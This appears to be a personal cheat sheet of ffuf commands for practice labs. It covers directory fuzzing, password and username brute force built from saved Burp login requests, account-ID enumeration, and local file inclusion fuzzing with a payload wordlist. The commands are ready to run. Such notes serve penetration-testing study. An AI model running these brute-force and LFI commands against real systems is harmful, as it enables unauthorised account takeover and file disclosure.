ffuf

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://10.0.0.10:80/FUZZ

# First save the burpsuite request that have "usernamme=sadf&password=asdasd"
# Right click then find the "copy to file"
# After that change the "password=asdd" to "password=FUZZ"

# the -fs 1814 will remove the response size 1814
ffuf -request req.txt -request-proto http -w /usr/share/wordlists/seclists/SecLists-master/Passwords/xato-net-10-million-passwords-10000.txt -fs 1814

# First save the burpsuite request that have "usernamme=asd&password=asdasd"
# Right click then find the "copy to file"
# After that change the "password=asdd" to "password=FUZZPASS" and "username=FUZZUSER"

# the -fs 3256,3376 will remove the response size 3256,3376
ffuf -request req.txt -request-proto http -mode clusterbomb -w /usr/share/wordlists/seclists/SecLists-master/Usernames/top-usernames-shortlist.txt:FUZZUSER -w pass.txt:FUZZPASS -fs 3256,3376

# It will find the word admin in the page as it iterates
# -mr Match regexp
ffuf -u http://localhost/labs/e0x02.php?account=FUZZ -w number1000-2000.txt -mr "admin"

# First you have to put the FUZZ in the parameter
# Like this /labs/api/fetchRecipe.php?filename=FUZZ
# This is located in req.txt
# Filter out the word length 19,20 since it returns error
ffuf -request req.txt -request-proto http -w /usr/share/wordlists/seclists/SecLists-master/Fuzzing/LFI/LFI-Jhaddix.txt -fw 19,20

# It will bruteforce for LFI
# -fw will not include the LFI payload that is invalid 
# Just look for the LFI payload like if the word is 19 remove it
# Keep trying

ffuf -request api-req.txt -request-proto http -w /usr/share/wordlists/seclists/SecLists-master/Fuzzing/LFI/LFI-Jhaddix.txt -fw 19,20